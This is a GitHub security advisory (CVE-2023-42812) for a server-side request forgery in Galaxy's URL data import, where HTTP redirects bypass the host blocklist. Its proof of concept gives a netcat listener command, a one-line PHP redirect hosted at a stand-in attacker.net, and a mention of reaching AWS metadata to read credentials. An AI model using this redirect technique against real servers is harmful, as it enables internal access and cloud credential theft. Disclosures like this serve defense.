Skip to content

Server Side Request Forgery (SSRF) during data imports

Moderate
dannon published GHSA-vf5q-r8p9-35xh Sep 22, 2023

Package

No package listed

Affected versions

*

Patched versions

> 22.05

Description

Summary

A server-side request forgery which allows a malicious to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses.

Details

During a data import users can specify a URL to import data, after the user attempts to import the data the URL is parsed as per:

https://github.com/galaxyproject/galaxy/blob/06d56c859713b74f1c2e35da1c2fcbbf0a965645/lib/galaxy/files/uris.py

Which parses the URL to obtain its host name as well its port number, the parsed URL is then compared to any in the block list. If the hostname equals to any IP address in the block list it will deny access. For example private address such as 127.0.0.1, 169.254.169.254 will deny access.

The Galaxy server uses Python-urllib/3.7 to make HTTP/HTTPS requests when importing data from a URL. By default urllib follows any HTTP/HTTPS redirects which allows an attacker to bypass the current security implementations by using a PHP redirect.

PoC

  1. Firstly on the galaxy server start a netcat listener using the following command (This is used to show that the HTTP request is being redirect to the localhost):
nc -lnvvp 9000 
  1. Next as the attacker host the following PHP script which can be accessed publicly:
<?php header('Location: http://127.0.0.1:9000', TRUE, 301); ?>
  1. Next logon to the Galaxy site and select the upload button.

  2. Lastly paste in the url where your PHP script is hosted and click import:
    e.g: http://attacker.net/redirect.php

  3. If you go back to your terminal you will see the netcat listener received a request.

Its also possible to redirect to the AWS metadata endpoint and read the AWS credentials as well as Alibaba Cloud instances. This does not affect Google Cloud/Microsoft Azure as those require specific headers to present

Impact

An attacker is able to issue arbitrary HTTP/HTTPS requests to internal hosts and read their responses.

Proof-of-Concept:

Recording.2023-08-14.115701.mp4

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CVE ID

CVE-2023-42812

Weaknesses

Credits